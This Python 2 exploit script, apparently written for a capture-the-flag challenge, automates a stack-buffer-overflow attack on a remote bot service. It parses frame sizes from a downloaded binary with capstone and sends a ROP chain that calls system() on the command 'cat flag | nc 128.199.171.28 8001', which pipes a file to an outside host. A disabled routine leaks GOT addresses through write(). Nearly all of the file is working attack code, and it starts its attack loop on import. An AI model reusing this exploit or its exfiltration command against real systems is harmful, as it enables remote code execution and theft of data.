#!/usr/bin/python
import socket
import re
from capstone import *
from Pwn import *
import sys
# p = Pwn(mode=1,host='52.20.10.244',port=12351)
def disas(code):
    """Disassemble *code* as x86-64 and return its operand strings joined together.

    Only ``op_str`` of each instruction is kept (mnemonics are dropped) and the
    pieces are concatenated with no separator; getPortSize() regex-matches the
    result against a ``rcx, qword ptr [rbp - N]`` operand form.

    Args:
        code: raw machine-code bytes to decode.

    Returns:
        The concatenated operand text as one string ('' when nothing decodes).
    """
    engine = Cs(CS_ARCH_X86, CS_MODE_64)
    # 0x1000 is the load address handed to capstone for the decoded bytes.
    return ''.join(insn.op_str for insn in engine.disasm(code, 0x1000))
def getPortSize():
    """Pull a bot description from the dispatcher and parse three values out of it.

    Connects to 52.20.10.244:8888, reads until the peer returns an empty
    chunk, then extracts from the blob (apparently the target ELF -- see the
    commented-out ./bin.elf write in exploit()):
      * port       -- 4 bytes at 0x7d5 ("Bot at" in exploit()'s output)
      * size       -- 4 bytes at 0x82f ("Recv size")
      * stack_size -- parsed from the 7-byte instruction at 0x824, which is
                      expected to disassemble to ``mov rcx, qword ptr [rbp - N]``

    Returns:
        (port, size, stack_size, blob): the three ints and the raw data.

    Raises:
        AttributeError: when the instruction at 0x824 does not match the
            expected operand pattern (re.match() returns None). exploit()
            catches exactly this and moves on to the next bot.
    """
    conn = Pwn(host='52.20.10.244', port=8888)
    conn.connect()
    # Drain the connection; the first empty chunk marks end of data.
    chunks = []
    chunk = conn.recv(1024)
    while len(chunk):
        chunks.append(chunk)
        chunk = conn.recv(1024)
    blob = ''.join(chunks)
    port = conn.unpack(blob[0x7d5:0x7d5 + 4])
    size = conn.unpack(blob[0x82f:0x82f + 4])
    # The frame size is read straight out of the prologue's rbp-relative load.
    frame_insn = disas(blob[0x824:0x824 + 7])
    hit = re.match(r'rcx, qword ptr \[rbp - ([0-9a-fx]*)\]', frame_insn)
    stack_size = int(hit.group(1), 16)  # AttributeError here when hit is None
    conn.close()
    return port, size, stack_size, blob
def getshell(p2,stack_size,system_addr,addr):
    """Send the stack-overflow payload that makes the bot return into ``system(addr)``.

    Args:
        p2: connected Pwn session to the bot (provides p32/pA/send/io).
        stack_size: frame size parsed by getPortSize(); the command string plus
            'A' padding fills exactly ``stack_size - 8`` bytes before the tail.
        system_addr: address of libc ``system`` -- a constant in the caller.
        addr: value popped into rdi before ``system`` runs; the caller passes a
            fixed stack constant, presumably where the command string at the
            head of the payload ends up.

    Defender notes (grounded only in what this file shows): the gadget, libc
    and stack addresses are all constants, so this presumably relies on a
    non-randomised layout (ASLR/PIE off); the tail is written straight over
    the frame, so a stack canary would likely stop it as well. The outbound
    ``nc 128.199.171.28 8001`` in the command is the exfiltration indicator.
    """
    payload = 'cat flag | nc 128.199.171.28 8001;'
    # Pad to stack_size - 8, then a fixed 16-byte tail: p32(0x6) + 'AAAA' + 'C'*8.
    # 0x6 is the same constant leak() feeds to write() as its first argument --
    # apparently a local that must keep its value (a descriptor?); the 'C'*8
    # presumably lands on the saved rbp. The chain appended below follows it.
    payload+= 'A'*(stack_size - 8 - len(payload)) + p2.p32(0x6) + 'AAAA' + 'C'*8
    rop = [
        0x4008d3, # pop rdi ; ret
        addr,     # -> rdi, the single argument of system()
        system_addr
    ]
    # Earlier leak chain kept for reference (same as the one in leak()).
    # rop = [
    # 0x4008d3, # pop rdi ; ret
    # 0x6,
    # 0x04008d1, # pop rsi ; pop r15 ; ret
    # addr,
    # 0x41414141,
    # 0x4005e0, # write
    # 0x40077D, # main
    # ]
    payload += p2.pA(rop)
    p2.send(payload)
    # leak = p2.recv(1024)
    # print leak
    # leak = p2.recv(1024)
    # print repr(leak)
    # Hand the session to the Pwn helper; what io() does is not visible here
    # (presumably an interactive relay). It does not return in the success path
    # as far as this file shows.
    p2.io()
def leak(p1,stack_size):
    """Send a write()-based GOT read and return the leaked listen() address.

    As committed this always returns 0: the lines that unpack the response
    into listen_addr are commented out and only ``print repr(leak)`` runs.
    Its only call site, in exploit(), is commented out as well.

    Chain (same framing as getshell(): pad to stack_size - 8, then
    p32(0x6) + 'AAAA' + 'C'*8, then the gadget list):
        pop rdi <- 0x6                    presumably the bot's socket descriptor
        pop rsi <- GOT slot of 'listen'   (r15 <- 0x41414141 filler)
        0x4005e0  annotated "write"       sends the slot's contents back; no
                                          gadget sets rdx, so the count is
                                          whatever the register already holds
        0x40077D  annotated "main"        presumably keeps the process alive

    Args:
        p1: connected Pwn session (provides p32/pA/got/send/recv/unpack).
        stack_size: frame size from getPortSize().

    Returns:
        int: always 0 in this revision (see above).
    """
    payload = 'A'*(stack_size - 8) + p1.p32(0x6) + 'AAAA' + 'C'*8
    rop = [
        0x4008d3, # pop rdi ; ret
        0x6,
        0x04008d1, # pop rsi ; pop r15 ; ret
        p1.got('listen'),
        0x41414141,
        0x4005e0, # write
        0x40077D, # main
    ]
    payload += p1.pA(rop)
    # f = open('bin.pl','w')
    # f.write(payload)
    # f.close()
    p1.send(payload)
    # NOTE: the local `leak` shadows this function's own name inside the body.
    # The first response is discarded -- it is overwritten by the second recv.
    leak = p1.recv(1024)
    leak = p1.recv(1024)
    print repr(leak)
    listen_addr = 0
    # if leak != '':
    # listen_addr = p1.unpack(leak[:8])
    return listen_addr
def exploit():
    """Attack loop: fetch a bot description, check it is overflowable, run getshell().

    system_addr (libc system) and start (a stack address) are constants, so
    this revision assumes a non-randomised layout; the commented-out leak()
    path below is the earlier attempt to derive system_addr at run time from
    a GOT read. The loop never terminates on its own: each iteration either
    skips a bot ("Can't overflow") or sends one payload and hands the session
    to p2.io().

    Exceptions handled per iteration:
        AttributeError -- raised inside getPortSize() when the frame-size
            instruction does not match its regex (re.match() returned None).
        socket.error   -- presumably raised by the Pwn helper on connect/recv.
    """
    system_addr = 0x7ffff7a5b640  # hard-coded libc system() address
    start = 0x7fffffffebc0 + 16   # hard-coded stack address handed to system() as rdi
    # isFound = True
    # it_time = False
    while 1:
        try:
            # NOTE: `bytes` shadows the builtin; the blob is unused in this revision
            # (the ./bin.elf write that consumed it is commented out below).
            _port,size,stack_size,bytes = getPortSize()
            print '[+] Bot at :',_port
            print '[+] Recv size:',size
            print '[+] Stack size:',stack_size
            # if isFound: # get shell time
            # Fit check against the bot's recv size. Assuming p32/pA emit 4 and
            # 8 bytes per entry, getshell()'s payload is stack_size + 32 bytes,
            # so this threshold is 8 bytes short of it; whether the last gadget
            # may be truncated is not visible from this file.
            if (stack_size + 24) > size:
                print 'Can\'t overflow'
                continue
            else:
                # print '[!!!!]',hex(start)
                # pfile='./bin.elf' must already exist on disk: nothing in this
                # revision writes it.
                p2 = Pwn(mode=1,host='52.20.10.244',port=_port,pfile='./bin.elf')
                p2.connect()
                getshell(p2,stack_size,system_addr,start)
                # break
            # Earlier approach (disabled): leak listen()'s libc address through
            # write() and compute system_addr from it instead of hard-coding it.
            # if (stack_size + 56) > size:
            # print 'Can\'t overflow'
            # continue
            # # f = open('./bin.elf','w')
            # # f.write(bytes)
            # # f.close()
            # p1 = Pwn(mode=1,host='52.20.10.244',port=_port,pfile='./bin.elf')
            # p1.connect()
            # # p2 = Pwn(mode=1,host='52.20.10.244',port=42462,pfile='./bin.elf')
            # listen_addr = leak(p1,stack_size)
            # if listen_addr != 0:
            # system_addr = listen_addr - p1.get_libc_offset(listen_addr,'listen')
            # # # bin_sh_addr = system_addr + 0x13669b
            # print '[+] listen()',hex(listen_addr)
            # print '[+] system()',hex(system_addr)
            # # print '[+] "/bin/sh":',hex(bin_sh_addr)
            # isFound = True
        except AttributeError:
            # getPortSize() found no matching frame-size instruction; try the next bot.
            print 'Suck ___^____^___'
        except socket.error:
            # Connection-level failure; loop around and fetch a new bot description.
            print 'Fuck.........'
    # system_addr = listen_addr - p1.get_libc_offset(listen_addr,'listen')
    # print '[+] listen()',hex(listen_addr)
    # print '[+] system()',hex(system_addr)
# Module-level entry point: the attack loop starts on import as well, since
# there is no __main__ guard; exploit() never returns on its own.
exploit()